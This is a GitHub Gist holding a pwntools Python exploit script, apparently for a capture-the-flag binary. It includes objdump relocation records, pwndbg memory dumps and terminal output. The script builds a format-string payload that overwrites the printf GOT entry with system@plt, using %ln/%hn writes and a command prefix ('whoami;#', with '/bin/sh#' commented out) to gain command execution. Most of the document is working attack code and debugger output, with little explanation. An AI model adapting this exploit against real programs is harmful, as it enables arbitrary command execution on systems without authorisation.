Created
January 23, 2022 05:55
-
-
Save M507/12d4f3bb767976ebc24f2b5a934580cf to your computer and use it in GitHub Desktop.
Exploits
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 8d16362098c47e4628413f20f6e5dd8840bd804950cd6714bb56e6b4e87c40d0 | |
| # fmtstr_payload() is not used here, it's more fun this way ;) | |
| from pwn import * | |
| import sys | |
| # 64bit | |
| def get_process(is_remote = False): | |
| if is_remote: | |
| return remote(*REMOTE_PATH) | |
| else: | |
| # return process([ld.path, binary.path], env={"LD_PRELOAD": libc.path}) | |
| return process(binary.path) | |
| """ | |
| objdump -R ./executable | |
| ./executable: file format elf64-x86-64 | |
| DYNAMIC RELOCATION RECORDS | |
| OFFSET TYPE VALUE | |
| 0000000000601ff0 R_X86_64_GLOB_DAT __libc_start_main@GLIBC_2.2.5 | |
| 0000000000601ff8 R_X86_64_GLOB_DAT __gmon_start__ | |
| 0000000000602080 R_X86_64_COPY stdout@@GLIBC_2.2.5 | |
| 0000000000602090 R_X86_64_COPY stdin@@GLIBC_2.2.5 | |
| 0000000000602018 R_X86_64_JUMP_SLOT putchar@GLIBC_2.2.5 | |
| 0000000000602020 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5 | |
| 0000000000602028 R_X86_64_JUMP_SLOT __stack_chk_fail@GLIBC_2.4 | |
| 0000000000602030 R_X86_64_JUMP_SLOT setresgid@GLIBC_2.2.5 | |
| 0000000000602038 R_X86_64_JUMP_SLOT setbuf@GLIBC_2.2.5 | |
| 0000000000602040 R_X86_64_JUMP_SLOT system@GLIBC_2.2.5 | |
| 0000000000602048 R_X86_64_JUMP_SLOT printf@GLIBC_2.2.5 | |
| 0000000000602050 R_X86_64_JUMP_SLOT fgets@GLIBC_2.2.5 | |
| 0000000000602058 R_X86_64_JUMP_SLOT strcmp@GLIBC_2.2.5 | |
| 0000000000602060 R_X86_64_JUMP_SLOT getegid@GLIBC_2.2.5 | |
| pwndbg> x/40x 0x0602040 │SyntaxError: invalid syntax | |
| 0x602040 <[email protected]>: 0x004006e6 0x00000000 0x004006f6 0x00000000 │root@kali-ctf:~/ctf/executable# python3 poc.py | |
| 0x602050 <[email protected]>: 0xf7e591b0 0x00007fff 0x00400716 0x00000000 │b'AAAAAAAA %24$p' | |
| 0x602060 <[email protected]>: 0xf7eb0120 0x00007fff 0x00000000 0x00000000 │root@kali-ctf:~/ctf/executable# | |
| 0x602070: 0x00000000 0x00000000 0x00000000 0x00000000 │root@kali-ctf:~/ctf/executable# python3 poc.py | |
| 0x602080 <stdout@@GLIBC_2.2.5>: 0xf7fa36c0 0x00007fff 0x00000000 0x00000000 │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# python3 poc.py > input | |
| 0x602090 <stdin@@GLIBC_2.2.5>: 0xf7fa29a0 0x00007fff 0x00000000 0x00000000 | |
| pwndbg> disass 'system@plt' │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# python3 poc.py > input | |
| Dump of assembler code for function system@plt: │root@kali-ctf:~/ctf/executable# cat input | |
| 0x00000000004006e0 <+0>: jmp QWORD PTR [rip+0x20195a] # 0x602040 <[email protected]> │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# cat input | |
| 0x00000000004006e6 <+6>: push 0x5 │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# python3 poc.py > input | |
| 0x00000000004006eb <+11>: jmp 0x400680 │root@kali-ctf:~/ctf/executable# cat input | |
| End of assembler dump. │3 | |
| pwndbg> | |
| """ | |
| # PREFIX = "ls;#" | |
| PREFIX = "whoami;#" | |
| # PREFIX = "/bin/sh#" | |
| payload = [ | |
| bytes(PREFIX,'utf-8'), | |
| b"B" * (8 - len(PREFIX)), | |
| b"B" * 40, | |
| bytes("...%16333x%OO$ln".replace('OO',str( 35 )),'utf-8'), | |
| bytes("...........%50907x%OO$hn".replace('OO',str( 36 )),'utf-8'), | |
| p64(0x0000000000602049), | |
| p64(0x0000000000602048), | |
| ] | |
| selection = b"3\n" | |
| payload = selection + b"".join(payload) + b"\n" | |
| sys.stdout.buffer.write(payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment